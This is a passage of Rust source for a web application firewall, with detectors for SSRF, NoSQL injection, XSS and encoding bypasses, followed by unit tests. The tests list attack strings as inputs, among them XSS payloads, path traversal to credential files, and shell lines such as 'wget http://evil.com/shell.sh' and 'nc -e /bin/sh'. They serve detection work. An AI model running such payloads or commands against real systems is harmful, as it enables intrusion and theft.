1868    if decoded != value && check_ssrf_patterns(&decoded) {
1869        return 1;
1870    }
1871
1872    // Double-decode for nested encoding bypass
1873    if decoded.contains('%') {
1874        let double_decoded = safe_percent_decode(&decoded);
1875        if double_decoded != decoded && check_ssrf_patterns(&double_decoded) {
1876            return 1;
1877        }
1878    }
1879
1880    0
1881}
1882
1883/// Check SSRF patterns against a value.
1884///
1885/// SECURITY: This function is critical for SSRF prevention. It checks for:
1886/// - Internal IP addresses in URLs
1887/// - Cloud metadata endpoints
1888/// - Dangerous URL schemes
1889#[inline]
1890fn check_ssrf_patterns(value: &str) -> bool {
1891    // Dangerous URL schemes (highest priority - always block)
1892    SSRF_DANGEROUS_SCHEME.is_match(value)
1893        // Cloud metadata endpoints (CRITICAL - AWS/GCP/Azure instance metadata)
1894        || SSRF_CLOUD_METADATA.is_match(value)
1895        || SSRF_METADATA_HOST.is_match(value)
1896        // Localhost addresses (IPv4 and IPv6)
1897        || SSRF_LOCALHOST_V4.is_match(value)
1898        || SSRF_LOCALHOST_V6.is_match(value)
1899        // IPv6-mapped IPv4 bypass attempts
1900        || SSRF_MAPPED_IPV6.is_match(value)
1901        // Private IP ranges
1902        || SSRF_PRIVATE_IP.is_match(value)
1903        // Link-local addresses
1904        || SSRF_LINK_LOCAL.is_match(value)
1905        // Encoded IP bypasses (decimal/hex/octal)
1906        || SSRF_ENCODED_IP.is_match(value)
1907}
1908
1909/// Analyzes a value for NoSQL injection patterns.
1910///
1911/// SECURITY: Detects NoSQL injection attempts including:
1912/// - MongoDB operator injection ($where, $ne, $gt, etc.)
1913/// - MongoDB $where JavaScript execution (HIGH RISK)
1914/// - MongoDB authentication bypass patterns
1915/// - MongoDB aggregation pipeline injection
1916/// - CouchDB special endpoints (_all_docs, _view, etc.)
1917/// - Redis dangerous commands
1918/// - Cassandra CQL injection
1919/// - JSON prototype pollution (__proto__, constructor)
1920///
1921/// Returns 1 if NoSQL injection patterns are detected, 0 otherwise.
1922fn nosql_analyzer_score(value: &str) -> u32 {
1923    // Check raw value first
1924    if check_nosql_patterns(value) {
1925        return 1;
1926    }
1927
1928    // URL-decode and check again (handles %24where -> $where)
1929    let decoded = safe_percent_decode(value);
1930    if decoded != value && check_nosql_patterns(&decoded) {
1931        return 1;
1932    }
1933
1934    // Double-decode for nested encoding bypass
1935    if decoded.contains('%') {
1936        let double_decoded = safe_percent_decode(&decoded);
1937        if double_decoded != decoded && check_nosql_patterns(&double_decoded) {
1938            return 1;
1939        }
1940    }
1941
1942    0
1943}
1944
1945/// Check NoSQL injection patterns against a value.
1946///
1947/// SECURITY: This function is critical for NoSQL injection prevention.
1948#[inline]
1949fn check_nosql_patterns(value: &str) -> bool {
1950    // HIGH RISK: $where with JavaScript (can execute arbitrary code)
1951    if NOSQL_WHERE_JS.is_match(value) {
1952        return true;
1953    }
1954
1955    // Authentication bypass attempts (e.g., {"password": {"$ne": null}})
1956    if NOSQL_AUTH_BYPASS.is_match(value) {
1957        return true;
1958    }
1959
1960    // JSON prototype pollution (can lead to RCE in Node.js)
1961    if JSON_PROTO_POLLUTION.is_match(value) {
1962        return true;
1963    }
1964
1965    // MongoDB operators (lower priority, more common in legitimate queries)
1966    NOSQL_MONGO_OPERATORS.is_match(value)
1967        || NOSQL_AGGREGATION.is_match(value)
1968        || NOSQL_COUCHDB.is_match(value)
1969        || NOSQL_REDIS.is_match(value)
1970        || NOSQL_CASSANDRA.is_match(value)
1971}
1972
1973/// Analyzes a value for XSS patterns.
1974///
1975/// SECURITY: Decodes HTML entities before pattern matching to prevent bypass
1976/// via entity encoding (e.g., `&#60;script&#62;` instead of `<script>`).
1977fn xss_analyzer_score(value: &str) -> u32 {
1978    // First check the raw value
1979    if check_xss_patterns(value) {
1980        return 1;
1981    }
1982
1983    // Decode HTML entities and check again
1984    let decoded = decode_html_entities(value);
1985    if decoded != value && check_xss_patterns(&decoded) {
1986        return 1;
1987    }
1988
1989    // Try double-decoding for nested encoding attacks
1990    if decoded.contains('&') {
1991        let double_decoded = decode_html_entities(&decoded);
1992        if double_decoded != decoded && check_xss_patterns(&double_decoded) {
1993            return 1;
1994        }
1995    }
1996
1997    0
1998}
1999
2000/// Check XSS patterns against a value.
2001#[inline]
2002fn check_xss_patterns(value: &str) -> bool {
2003    XSS_SCRIPT.is_match(value)
2004        || XSS_JS_SCHEME.is_match(value)
2005        || XSS_ON_ATTR.is_match(value)
2006        || XSS_COOKIE.is_match(value)
2007        || XSS_IMG_SRC.is_match(value)
2008}
2009
/// Decode HTML character references in a string.
///
/// Handles:
/// - Decimal references: `&#60;` -> `<`
/// - Hexadecimal references: `&#x3C;` or `&#X3C;` -> `<`
/// - Zero-padded numeric references of any length: `&#0000000060;` -> `<`
/// - Named entities known to `decode_single_entity`: `&lt;` -> `<`,
///   `&gt;` -> `>`, `&amp;` -> `&`, `&quot;` -> `"`, `&apos;` -> `'`, ...
///
/// Only `;`-terminated references are decoded, and decoding is a single pass
/// (`&amp;lt;` becomes `&lt;`, not `<`); callers that need nested decoding
/// call this function again. Text that is not a recognised reference is
/// copied through unchanged.
///
/// SECURITY: This is used to normalize input before XSS pattern matching
/// to prevent bypass via HTML entity encoding. Leading zeros of numeric
/// references do not count towards the length limit, because browsers accept
/// arbitrary zero padding and a fixed cap would let `&#000000060;` through
/// undecoded.
fn decode_html_entities(value: &str) -> String {
    /// Longest reference body (the text between `&` and `;`) that is decoded,
    /// not counting zero padding of numeric references.
    const MAX_ENTITY_LEN: usize = 9;

    /// Length of `body` once the zero padding of a numeric reference
    /// (`#000060`, `#x00003C`) is discounted. Named bodies are returned as-is.
    fn significant_len(body: &str) -> usize {
        let digits = match body.strip_prefix('#') {
            Some(number) => number
                .strip_prefix('x')
                .or_else(|| number.strip_prefix('X'))
                .unwrap_or(number),
            None => return body.len(),
        };
        let padding = digits.len() - digits.trim_start_matches('0').len();
        body.len() - padding
    }

    if !value.contains('&') {
        return value.to_string();
    }

    let mut result = String::with_capacity(value.len());
    let mut rest = value;

    while let Some(amp) = rest.find('&') {
        result.push_str(&rest[..amp]);
        let after = &rest[amp + 1..];

        // Candidate reference body: the run of ASCII alphanumerics and '#'.
        // The run is ASCII-only, so slicing at its end is always valid.
        let body_len = after
            .bytes()
            .take_while(|b| b.is_ascii_alphanumeric() || *b == b'#')
            .count();
        let body = &after[..body_len];
        let terminated = after.as_bytes().get(body_len) == Some(&b';');

        if terminated && !body.is_empty() && significant_len(body) <= MAX_ENTITY_LEN {
            if let Some(decoded) = decode_single_entity(body) {
                result.push(decoded);
                // Skip the body and its terminating ';'.
                rest = &after[body_len + 1..];
                continue;
            }
        }

        // Not a valid reference: keep the '&' and let the following text be
        // copied verbatim by the next iteration.
        result.push('&');
        rest = after;
    }

    result.push_str(rest);
    result
}

/// Decode a single HTML entity (without & and ;).
///
/// `entity` is either a numeric reference body (`#60`, `#x3C`, `#X3C`) or one
/// of the named entities listed below. Returns `None` for unknown names,
/// unparsable numbers, and code points that are not valid `char`s.
fn decode_single_entity(entity: &str) -> Option<char> {
    // Numeric reference: decimal (`#60`) or hexadecimal (`#x3C` / `#X3C`).
    if let Some(number) = entity.strip_prefix('#') {
        let code = match number
            .strip_prefix('x')
            .or_else(|| number.strip_prefix('X'))
        {
            Some(hex) => u32::from_str_radix(hex, 16),
            None => number.parse::<u32>(),
        };
        return code.ok().and_then(char::from_u32);
    }

    // Named entities (common XSS-relevant ones). The uppercase spellings
    // `LT`, `GT`, `AMP` and `QUOT` are valid HTML5 references and decode to
    // the same characters as their lowercase forms.
    match entity {
        "lt" | "LT" => Some('<'),
        "gt" | "GT" => Some('>'),
        "amp" | "AMP" => Some('&'),
        "quot" | "QUOT" => Some('"'),
        "apos" => Some('\''),
        "nbsp" => Some('\u{00A0}'),
        // Additional commonly abused entities
        "tab" | "Tab" => Some('\t'),
        "newline" | "NewLine" => Some('\n'),
        "colon" => Some(':'),
        "sol" => Some('/'),
        "equals" => Some('='),
        "lpar" => Some('('),
        "rpar" => Some(')'),
        "lsqb" | "lbrack" => Some('['),
        "rsqb" | "rbrack" => Some(']'),
        "lcub" | "lbrace" => Some('{'),
        "rcub" | "rbrace" => Some('}'),
        "semi" => Some(';'),
        "comma" => Some(','),
        "period" | "dot" => Some('.'),
        "excl" => Some('!'),
        "quest" => Some('?'),
        "num" => Some('#'),
        "percnt" => Some('%'),
        "plus" => Some('+'),
        "minus" | "dash" => Some('-'),
        "ast" | "midast" => Some('*'),
        "verbar" | "vert" => Some('|'),
        "bsol" => Some('\\'),
        "circ" => Some('^'),
        "grave" => Some('`'),
        "tilde" => Some('~'),
        "at" | "commat" => Some('@'),
        _ => None,
    }
}
2129
2130fn safe_percent_decode(value: &str) -> String {
2131    // Handle form encoding (+ -> space) first
2132    let replaced = value.replace('+', " ");
2133    percent_decode_str(&replaced)
2134        .decode_utf8()
2135        .map(|c| c.into_owned())
2136        .unwrap_or_else(|_| value.to_string())
2137}
2138
2139fn decode_if_base64(value: &str) -> String {
2140    let sanitized = value.trim();
2141    if sanitized.len() < 8 {
2142        return value.to_string();
2143    }
2144
2145    // Try standard Base64 first
2146    if let Ok(bytes) = BASE64_STANDARD.decode(sanitized.as_bytes()) {
2147        if let Ok(decoded) = String::from_utf8(bytes) {
2148            if !decoded.is_empty() {
2149                return decoded;
2150            }
2151        }
2152    }
2153
2154    // Try URL-safe Base64 (common in web payloads)
2155    use base64::engine::general_purpose::URL_SAFE_NO_PAD;
2156    if let Ok(bytes) = URL_SAFE_NO_PAD.decode(sanitized.as_bytes()) {
2157        if let Ok(decoded) = String::from_utf8(bytes) {
2158            if !decoded.is_empty() {
2159                return decoded;
2160            }
2161        }
2162    }
2163
2164    value.to_string()
2165}
2166
2167fn build_raw_request(ctx: &EvalContext) -> String {
2168    let mut out = String::new();
2169    out.push_str(&format!("{} {} HTTP/1.1", ctx.method, ctx.url));
2170    out.push('\n');
2171    for (key, value) in &ctx.headers {
2172        out.push_str(key);
2173        out.push_str(": ");
2174        out.push_str(value);
2175        out.push('\n');
2176    }
2177    out.push('\n');
2178    if let Some(body) = ctx.body_text {
2179        out.push_str(body);
2180    }
2181    out
2182}
2183
/// Extracts the `boundary` parameter from a `Content-Type` header value.
///
/// Parameters are separated by `;`. The parameter name is compared
/// case-insensitively, and surrounding whitespace and double quotes are
/// stripped from its value. Only the first `boundary` parameter is
/// considered; `None` is returned when it is missing or empty.
fn extract_multipart_boundary(content_type: &str) -> Option<String> {
    for param in content_type.split(';') {
        if let Some((name, raw)) = param.trim().split_once('=') {
            if name.trim().eq_ignore_ascii_case("boundary") {
                let boundary = raw.trim().trim_matches('"');
                // The first boundary parameter decides, even when empty.
                return if boundary.is_empty() {
                    None
                } else {
                    Some(boundary.to_string())
                };
            }
        }
    }
    None
}
2198
/// Extracts the field values from a multipart body.
///
/// The body is decoded as UTF-8 (lossily) and split on `--<boundary>`. For
/// each part, everything after the blank line that ends the part headers is
/// returned, trimmed of surrounding whitespace. The closing delimiter, empty
/// parts, parts without a header terminator and empty values are skipped.
///
/// SECURITY: both CRLF (`\r\n\r\n`) and bare-LF (`\n\n`) header terminators
/// are accepted, whichever comes first in the part. Lenient backends parse
/// LF-only multipart bodies, so ignoring them would let such a body bypass
/// inspection entirely.
fn parse_multipart_values(raw_body: &[u8], boundary: &str) -> Vec<String> {
    /// Blank-line sequences that end a part's header block.
    const HEADER_TERMINATORS: [&str; 2] = ["\r\n\r\n", "\n\n"];

    let body = String::from_utf8_lossy(raw_body);
    let marker = format!("--{}", boundary);

    body.split(marker.as_str())
        .filter_map(|part| {
            let part = part.trim();
            // After the final boundary only "--" (the closing delimiter) and
            // optional epilogue text remain.
            if part.is_empty() || part.starts_with("--") {
                return None;
            }

            // Offset just past the earliest header terminator.
            let content_start = HEADER_TERMINATORS
                .iter()
                .filter_map(|sep| part.find(*sep).map(|at| (at, at + sep.len())))
                .min()
                .map(|(_, end)| end)?;

            let value = part[content_start..].trim();
            if value.is_empty() {
                None
            } else {
                Some(value.to_string())
            }
        })
        .collect()
}
2223
2224fn select_argument_values(
2225    engine: &Engine,
2226    selector: Option<&MatchCondition>,
2227    ctx: &EvalContext,
2228) -> Vec<String> {
2229    let mut values = Vec::new();
2230    for entry in &ctx.arg_entries {
2231        if selector
2232            .map(|sel| matches_selector(engine, sel, &entry.key))
2233            .unwrap_or(true)
2234        {
2235            values.push(entry.value.clone());
2236        }
2237    }
2238    values
2239}
2240
2241fn matches_selector(engine: &Engine, selector: &MatchCondition, candidate: &str) -> bool {
2242    match selector.kind.as_str() {
2243        "to_lowercase" => {
2244            let lowered = candidate.to_lowercase();
2245            selector
2246                .match_value
2247                .as_ref()
2248                .and_then(|m| m.as_cond())
2249                .map(|child| matches_selector(engine, child, &lowered))
2250                .unwrap_or(true)
2251        }
2252        "regex" => engine.eval_regex(selector.match_value.as_ref(), Some(candidate)),
2253        "hashset" => eval_hashset(selector.match_value.as_ref(), Some(candidate)),
2254        "multiple_contains" => {
2255            eval_multiple_contains(selector.match_value.as_ref(), Some(candidate))
2256        }
2257        "contains" => eval_contains(selector.match_value.as_ref(), Some(candidate)),
2258        "equals" => eval_equals(selector.match_value.as_ref(), Some(candidate)),
2259        _ => false,
2260    }
2261}
2262
2263fn collect_regex_patterns(condition: &MatchCondition, out: &mut Vec<String>) {
2264    if condition.kind == "regex" {
2265        if let Some(MatchValue::Str(s)) = condition.match_value.as_ref() {
2266            out.push(s.clone());
2267        }
2268    }
2269    if let Some(mv) = condition.match_value.as_ref() {
2270        if let Some(child) = mv.as_cond() {
2271            collect_regex_patterns(child, out);
2272        } else if let Some(arr) = mv.as_arr() {
2273            for item in arr {
2274                if let Some(child) = item.as_cond() {
2275                    collect_regex_patterns(child, out);
2276                }
2277            }
2278        }
2279    }
2280    if let Some(selector) = condition.selector.as_ref() {
2281        collect_regex_patterns(selector, out);
2282    }
2283}
2284
2285fn collect_word_values(condition: &MatchCondition, out: &mut Vec<String>) {
2286    if condition.kind == "word" {
2287        if let Some(MatchValue::Str(s)) = condition.match_value.as_ref() {
2288            out.push(s.clone());
2289        }
2290    }
2291    if let Some(mv) = condition.match_value.as_ref() {
2292        if let Some(child) = mv.as_cond() {
2293            collect_word_values(child, out);
2294        } else if let Some(arr) = mv.as_arr() {
2295            for item in arr {
2296                if let Some(child) = item.as_cond() {
2297                    collect_word_values(child, out);
2298                }
2299            }
2300        }
2301    }
2302    if let Some(selector) = condition.selector.as_ref() {
2303        collect_word_values(selector, out);
2304    }
2305}
2306
2307#[cfg(test)]
2308mod tests {
2309    use super::*;
2310    use crate::waf::types::Header;
2311
2312    #[test]
2313    fn test_empty_engine() {
2314        let engine = Engine::empty();
2315        assert_eq!(engine.rule_count(), 0);
2316    }
2317
2318    #[test]
2319    fn test_load_rules() {
2320        let mut engine = Engine::empty();
2321        let rules = r#"[
2322            {
2323                "id": 1,
2324                "description": "SQL injection",
2325                "risk": 10.0,
2326                "blocking": true,
2327                "matches": [
2328                    {"type": "uri", "match": {"type": "contains", "match": "' OR '"}}
2329                ]
2330            }
2331        ]"#;
2332        let count = engine.load_rules(rules.as_bytes()).unwrap();
2333        assert_eq!(count, 1);
2334    }
2335
2336    #[test]
2337    fn test_analyze_sqli() {
2338        let mut engine = Engine::empty();
2339        let rules = r#"[
2340            {
2341                "id": 1,
2342                "description": "SQL injection",
2343                "risk": 10.0,
2344                "blocking": true,
2345                "matches": [
2346                    {"type": "uri", "match": {"type": "contains", "match": "' OR '"}}
2347                ]
2348            }
2349        ]"#;
2350        engine.load_rules(rules.as_bytes()).unwrap();
2351
2352        let verdict = engine.analyze(&Request {
2353            method: "GET",
2354            path: "/api/users?id=1' OR '1'='1",
2355            ..Default::default()
2356        });
2357
2358        assert_eq!(verdict.action, Action::Block);
2359        assert!(verdict.risk_score > 0);
2360        assert!(verdict.matched_rules.contains(&1));
2361    }
2362
2363    #[test]
2364    fn test_sql_analyzer() {
2365        // SQL phrases detection
2366        assert!(sql_analyzer_score("SELECT * FROM users") > 0);
2367        assert!(sql_analyzer_score("SELECT * FROM information_schema") > 0);
2368        assert!(sql_analyzer_score("INSERT INTO users") > 0);
2369        assert!(sql_analyzer_score("DELETE FROM users") > 0);
2370        assert!(sql_analyzer_score("UNION SELECT * FROM users") > 0);
2371        // SQL comment injection
2372        assert!(sql_analyzer_score("admin' --") > 0);
2373        // Normal text should not match
2374        assert!(sql_analyzer_score("hello world") == 0);
2375        assert!(sql_analyzer_score("normal query string") == 0);
2376    }
2377
2378    #[test]
2379    fn test_xss_analyzer() {
2380        assert!(xss_analyzer_score("<script>alert(1)</script>") > 0);
2381        assert!(xss_analyzer_score("javascript:alert(1)") > 0);
2382        assert!(xss_analyzer_score("onclick=alert(1)") > 0);
2383        assert!(xss_analyzer_score("hello world") == 0);
2384    }
2385
2386    /// SECURITY TEST: Verify XSS detection cannot be bypassed via HTML entity encoding.
2387    #[test]
2388    fn test_xss_analyzer_html_entity_bypass() {
2389        // Decimal entity encoding bypass attempts
2390        assert!(
2391            xss_analyzer_score("&#60;script&#62;alert(1)&#60;/script&#62;") > 0,
2392            "Should detect <script> via decimal entities"
2393        );
2394
2395        // Hex entity encoding bypass attempts
2396        assert!(
2397            xss_analyzer_score("&#x3C;script&#x3E;alert(1)&#x3C;/script&#x3E;") > 0,
2398            "Should detect <script> via hex entities"
2399        );
2400
2401        // Named entity encoding bypass attempts
2402        assert!(
2403            xss_analyzer_score("&lt;script&gt;alert(1)&lt;/script&gt;") > 0,
2404            "Should detect <script> via named entities"
2405        );
2406
2407        // Mixed encoding
2408        assert!(
2409            xss_analyzer_score("&#60;script&gt;alert(1)&#x3C;/script>") > 0,
2410            "Should detect <script> via mixed entities"
2411        );
2412
2413        // javascript: scheme with entity encoding
2414        assert!(
2415            xss_analyzer_score(
2416                "&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;alert(1)"
2417            ) > 0,
2418            "Should detect javascript: via decimal entities"
2419        );
2420
2421        // onerror with entity encoding
2422        assert!(
2423            xss_analyzer_score("&#111;&#110;&#101;&#114;&#114;&#111;&#114;=alert(1)") > 0,
2424            "Should detect onerror via decimal entities"
2425        );
2426
2427        // document.cookie with entities
2428        assert!(
2429            xss_analyzer_score("&#100;&#111;&#99;&#117;&#109;&#101;&#110;&#116;&#46;&#99;&#111;&#111;&#107;&#105;&#101;") > 0,
2430            "Should detect document.cookie via decimal entities"
2431        );
2432
2433        // Uppercase hex entities
2434        assert!(
2435            xss_analyzer_score("&#X3C;script&#X3E;") > 0,
2436            "Should detect script tag with uppercase hex"
2437        );
2438
2439        // img tag with entity encoding
2440        assert!(
2441            xss_analyzer_score("&#60;img src=x onerror=alert(1)&#62;") > 0,
2442            "Should detect img tag via entities"
2443        );
2444    }
2445
2446    /// Test HTML entity decoder directly.
2447    #[test]
2448    fn test_decode_html_entities() {
2449        // Decimal entities
2450        assert_eq!(decode_html_entities("&#60;"), "<");
2451        assert_eq!(decode_html_entities("&#62;"), ">");
2452        assert_eq!(decode_html_entities("&#60;script&#62;"), "<script>");
2453
2454        // Hex entities
2455        assert_eq!(decode_html_entities("&#x3C;"), "<");
2456        assert_eq!(decode_html_entities("&#x3E;"), ">");
2457        assert_eq!(decode_html_entities("&#X3C;script&#X3E;"), "<script>");
2458
2459        // Named entities
2460        assert_eq!(decode_html_entities("&lt;"), "<");
2461        assert_eq!(decode_html_entities("&gt;"), ">");
2462        assert_eq!(decode_html_entities("&amp;"), "&");
2463        assert_eq!(decode_html_entities("&quot;"), "\"");
2464        assert_eq!(decode_html_entities("&apos;"), "'");
2465
2466        // Mixed content
2467        assert_eq!(decode_html_entities("hello &lt;world&gt;"), "hello <world>");
2468
2469        // No entities
2470        assert_eq!(decode_html_entities("no entities here"), "no entities here");
2471
2472        // Invalid entities pass through
2473        assert_eq!(decode_html_entities("&unknown;"), "&unknown;");
2474        assert_eq!(decode_html_entities("&;"), "&;");
2475
2476        // Incomplete entities
2477        assert_eq!(decode_html_entities("&lt"), "&lt");
2478    }
2479
2480    /// Test double-decoding detection for nested encoding attacks.
2481    #[test]
2482    fn test_xss_double_encoding_bypass() {
2483        // Double-encoded <script> tag: first decode gives &#60;, second gives <
2484        // &amp;#60; -> &#60; -> <
2485        assert!(
2486            xss_analyzer_score("&amp;#60;script&amp;#62;") > 0,
2487            "Should detect double-encoded script tag"
2488        );
2489    }
2490
2491    /// Test command injection detection.
2492    #[test]
2493    fn test_cmd_analyzer() {
2494        // Backtick command execution
2495        assert!(
2496            cmd_analyzer_score(r"`cat /etc/passwd`") > 0,
2497            "Should detect backtick execution"
2498        );
2499        assert!(
2500            cmd_analyzer_score(r"`id`") > 0,
2501            "Should detect simple backtick"
2502        );
2503
2504        // $() command substitution
2505        assert!(
2506            cmd_analyzer_score(r"$(cat /etc/passwd)") > 0,
2507            "Should detect subshell execution"
2508        );
2509        assert!(
2510            cmd_analyzer_score(r"$(whoami)") > 0,
2511            "Should detect simple subshell"
2512        );
2513
2514        // Variable substitution
2515        assert!(
2516            cmd_analyzer_score(r"${PATH}") > 0,
2517            "Should detect variable substitution"
2518        );
2519        assert!(
2520            cmd_analyzer_score(r"${IFS}") > 0,
2521            "Should detect IFS substitution"
2522        );
2523
2524        // IFS manipulation
2525        assert!(cmd_analyzer_score(r"$IFS") > 0, "Should detect $IFS");
2526        assert!(
2527            cmd_analyzer_score(r"IFS=x") > 0,
2528            "Should detect IFS assignment"
2529        );
2530
2531        // Dangerous commands
2532        assert!(
2533            cmd_analyzer_score(r"cat /etc/passwd") > 0,
2534            "Should detect /etc/passwd access"
2535        );
2536        assert!(
2537            cmd_analyzer_score(r"cat /etc/shadow") > 0,
2538            "Should detect /etc/shadow access"
2539        );
2540        assert!(
2541            cmd_analyzer_score(r"wget http://evil.com/shell.sh") > 0,
2542            "Should detect wget"
2543        );
2544        assert!(
2545            cmd_analyzer_score(r"curl http://evil.com") > 0,
2546            "Should detect curl"
2547        );
2548        assert!(
2549            cmd_analyzer_score(r"nc -e /bin/sh") > 0,
2550            "Should detect netcat"
2551        );
2552        assert!(cmd_analyzer_score(r"bash -i") > 0, "Should detect bash -i");
2553        assert!(
2554            cmd_analyzer_score(r"/bin/sh -c 'cmd'") > 0,
2555            "Should detect /bin/sh -c"
2556        );
2557
2558        // Clean values should not match
2559        assert!(
2560            cmd_analyzer_score("hello world") == 0,
2561            "Clean value should not match"
2562        );
2563        assert!(
2564            cmd_analyzer_score("user@example.com") == 0,
2565            "Email should not match"
2566        );
2567    }
2568
/// SECURITY TEST: percent-encoded line breaks must earn a positive score from
/// `cmd_analyzer_score`, including the double-encoded form.
#[test]
fn test_cmd_analyzer_newline_bypass() {
    // (payload, failure message) pairs, asserted in declaration order.
    const MUST_FLAG: &[(&str, &str)] = &[
        // Single URL-encoded newline / carriage return
        ("id%0acat /etc/passwd", "Should detect %0a newline injection"),
        ("cmd%0dmore", "Should detect %0d carriage return injection"),
        ("%0A%0D", "Should detect uppercase encoded CRLF"),
        // Double-encoded newline
        ("id%250acat", "Should detect double-encoded newline"),
    ];

    for &(payload, why) in MUST_FLAG {
        assert!(cmd_analyzer_score(payload) > 0, "{}", why);
    }
}
2592
/// SECURITY TEST: `$IFS` substitution and brace expansion payloads must earn a
/// positive score from `cmd_analyzer_score`.
#[test]
fn test_cmd_analyzer_ifs_bypass() {
    // IFS bypass techniques, paired with the message reported on a miss.
    let bypass_payloads = [
        (r"cat${IFS}/etc/passwd", "Should detect $IFS brace bypass"),
        (r"cat$IFS/etc/passwd", "Should detect $IFS bypass"),
        (r"{cat,/etc/passwd}", "Should detect brace expansion"),
    ];

    bypass_payloads
        .iter()
        .for_each(|&(payload, why)| assert!(cmd_analyzer_score(payload) > 0, "{}", why));
}
2610
/// SECURITY TEST: null-byte markers (`%00` and a literal `\x00` escape sequence)
/// must earn a positive score from `cmd_analyzer_score`.
#[test]
fn test_cmd_analyzer_null_byte() {
    // True when the analyzer assigns the payload a positive score.
    let flagged = |payload: &str| cmd_analyzer_score(payload) > 0;

    assert!(flagged("file.txt%00.jpg"), "Should detect %00 null byte");
    assert!(flagged("cmd\\x00param"), "Should detect \\x00 null byte");
}
2623
/// Baseline check for `path_traversal_analyzer_score`: plain traversal sequences
/// score above zero, ordinary paths score exactly zero.
#[test]
fn test_path_traversal_analyzer_basic() {
    // Basic path traversal
    const TRAVERSALS: &[(&str, &str)] = &[
        ("../etc/passwd", "Should detect basic ../"),
        ("..\\Windows\\System32", "Should detect basic ..\\"),
        ("....//etc/passwd", "Should detect multiple dots"),
    ];
    // Clean paths should not match
    const BENIGN: &[(&str, &str)] = &[
        ("/home/user/file.txt", "Clean path should not match"),
        (
            "relative/path/to/file",
            "Relative path without traversal should not match",
        ),
    ];

    for &(path, why) in TRAVERSALS {
        assert!(path_traversal_analyzer_score(path) > 0, "{}", why);
    }
    for &(path, why) in BENIGN {
        assert!(path_traversal_analyzer_score(path) == 0, "{}", why);
    }
}
2651
/// SECURITY TEST: fully and partially percent-encoded `../` sequences, in either
/// hex case, must earn a positive score from `path_traversal_analyzer_score`.
#[test]
fn test_path_traversal_url_encoding_bypass() {
    const ENCODED: &[(&str, &str)] = &[
        // Single URL-encoded
        (
            "%2e%2e%2fetc/passwd",
            "Should detect %2e%2e%2f (URL-encoded ../)",
        ),
        ("..%2fetc/passwd", "Should detect ..%2f (partial encoding)"),
        ("%2e%2e/etc/passwd", "Should detect %2e%2e/ (partial encoding)"),
        // Uppercase encoding
        ("%2E%2E%2Fetc/passwd", "Should detect uppercase %2E%2E%2F"),
    ];

    for &(path, why) in ENCODED {
        assert!(path_traversal_analyzer_score(path) > 0, "{}", why);
    }
}
2675
/// SECURITY TEST: traversal sequences hidden behind two or three layers of
/// percent-encoding must earn a positive score from
/// `path_traversal_analyzer_score`.
#[test]
fn test_path_traversal_double_encoding_bypass() {
    let layered = [
        // Double URL-encoded: %252e -> %2e after one decode -> '.' after two
        (
            "%252e%252e%252fetc/passwd",
            "Should detect double-encoded %252e%252e%252f",
        ),
        ("%252E%252E%252F", "Should detect uppercase double-encoded"),
        // Triple encoding (extreme case)
        (
            "%25252e%25252e%25252f",
            "Should detect triple-encoded path traversal",
        ),
    ];

    for &(path, why) in layered.iter() {
        assert!(path_traversal_analyzer_score(path) > 0, "{}", why);
    }
}
2695
/// SECURITY TEST: overlong UTF-8 encodings of `.` and `/` must earn a positive
/// score from `path_traversal_analyzer_score`.
#[test]
fn test_path_traversal_unicode_bypass() {
    const OVERLONG: &[(&str, &str)] = &[
        // Overlong UTF-8 encoding of '.'
        (
            "%c0%ae%c0%ae/etc/passwd",
            "Should detect overlong UTF-8 %c0%ae (dot)",
        ),
        // Overlong UTF-8 encoding of '/'
        (
            "..%c0%afetc/passwd",
            "Should detect overlong UTF-8 %c0%af (slash)",
        ),
        // Both combined
        (
            "%c0%ae%c0%ae%c0%afetc%c0%afpasswd",
            "Should detect mixed overlong encoding",
        ),
    ];

    OVERLONG
        .iter()
        .for_each(|&(path, why)| assert!(path_traversal_analyzer_score(path) > 0, "{}", why));
}
2715
/// SECURITY TEST: Windows-flavoured traversal (backslashes, encoded backslash,
/// well-known target files) must earn a positive score from
/// `path_traversal_analyzer_score`.
#[test]
fn test_path_traversal_windows_patterns() {
    // The boot.ini payload appears twice on purpose: once as a backslash
    // variant and once as a sensitive-file target, each with its own message.
    const WINDOWS_CASES: &[(&str, &str)] = &[
        // Backslash variants
        ("..\\..\\boot.ini", "Should detect Windows backslash traversal"),
        ("%2e%2e%5c", "Should detect %5c (encoded backslash)"),
        // Windows sensitive files
        (
            "..\\..\\Windows\\System32\\config\\SAM",
            "Should detect SAM file access",
        ),
        ("..\\..\\boot.ini", "Should detect boot.ini access"),
    ];

    for &(path, why) in WINDOWS_CASES {
        assert!(path_traversal_analyzer_score(path) > 0, "{}", why);
    }
}
2739
/// SECURITY TEST: traversal payloads aimed at sensitive Unix locations must earn
/// a positive score from `path_traversal_analyzer_score`.
#[test]
fn test_path_traversal_unix_sensitive_targets() {
    // True when the analyzer assigns the path a positive score.
    let flagged = |path: &str| path_traversal_analyzer_score(path) > 0;

    // Unix sensitive files, always reached through a traversal prefix.
    assert!(
        flagged("../../etc/passwd"),
        "Should detect /etc/passwd access"
    );
    assert!(
        flagged("..%2f..%2fetc%2fshadow"),
        "Should detect encoded /etc/shadow access"
    );
    assert!(flagged("../../.ssh/id_rsa"), "Should detect .ssh access");
    assert!(
        flagged("../../proc/self/environ"),
        "Should detect /proc access"
    );
}
2761
/// SECURITY TEST: null-byte truncation markers combined with traversal must earn
/// a positive score from `path_traversal_analyzer_score`.
#[test]
fn test_path_traversal_null_byte() {
    const TRUNCATIONS: &[(&str, &str)] = &[
        ("../etc/passwd%00.jpg", "Should detect null byte truncation"),
        ("file.txt\\x00../etc/passwd", "Should detect \\x00 null byte"),
    ];

    for &(path, why) in TRUNCATIONS {
        assert!(path_traversal_analyzer_score(path) > 0, "{}", why);
    }
}
2774
/// Checks the `normalize_unicode_path` helper: each encoded input must come back
/// as the listed plain character sequence.
#[test]
fn test_normalize_unicode_path() {
    // (encoded input, expected normalized output)
    const EXPECTATIONS: &[(&str, &str)] = &[
        // Dot normalization
        ("%c0%ae", "."),
        ("%C0%AE", "."),
        ("%e0%80%ae", "."),
        // Slash normalization
        ("%c0%af", "/"),
        ("%C0%AF", "/"),
        // Backslash normalization
        ("%c1%9c", "\\"),
        ("%C1%9C", "\\"),
        // Combined
        ("%c0%ae%c0%ae%c0%af", "../"),
    ];

    for &(encoded, expected) in EXPECTATIONS {
        assert_eq!(normalize_unicode_path(encoded), expected);
    }
}
2794
2795    // ==================== SSRF Detection Tests ====================
2796
/// Loopback targets, IPv4 and IPv6, must earn a positive score from
